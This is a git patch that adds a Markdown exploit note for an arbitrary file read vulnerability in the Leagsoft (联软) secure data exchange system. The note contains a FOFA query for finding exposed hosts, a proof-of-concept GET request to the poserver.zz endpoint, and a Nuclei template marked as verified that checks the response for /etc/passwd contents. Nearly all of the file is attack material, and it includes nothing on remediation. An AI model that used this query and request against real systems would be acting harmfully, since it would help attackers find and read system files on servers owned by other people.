From b929fd994592c7e4e938209562106ab9ad8d53b1 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Tue, 30 Jan 2024 19:42:04 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E8=81=94=E8=BD=AF=E5=AE=89=E5=85=A8?= =?UTF-8?q?=E6=95=B0=E6=8D=AE=E4=BA=A4=E6=8D=A2=E7=B3=BB=E7=BB=9F=E4=BB=BB?= =?UTF-8?q?=E6=84=8F=E6=96=87=E4=BB=B6=E8=AF=BB=E5=8F=96.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 联软安全数据交换系统任意文件读取.md | 41 +++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 联软安全数据交换系统任意文件读取.md diff --git a/联软安全数据交换系统任意文件读取.md b/联软安全数据交换系统任意文件读取.md new file mode 100644 index 0000000..f6f3919 --- /dev/null +++ b/联软安全数据交换系统任意文件读取.md @@ -0,0 +1,41 @@ +## 联软安全数据交换系统任意文件读取 + +## fofa +``` +body="UniExServices" +``` + +## poc +``` +/UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI= +``` + +## nuclei +``` +id: leagsoft-safedata-exchange-file-fileread + +info: + name: 联软安全数据交换系统任意文件读取 + author: mmy + severity: high + tags: leagsoft,fileread + description: 联软安全数据交换系统任意文件读取 + reference: + - + metadata: + fofa-query: 'body="UniExServices"' + verified: true + max-request: 1 + +http: + - method: GET + path: + - "{{RootURL}}/UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI=" + + matchers: + - type: regex + part: body + regex: + - "root:[x*]:0:0:" + +```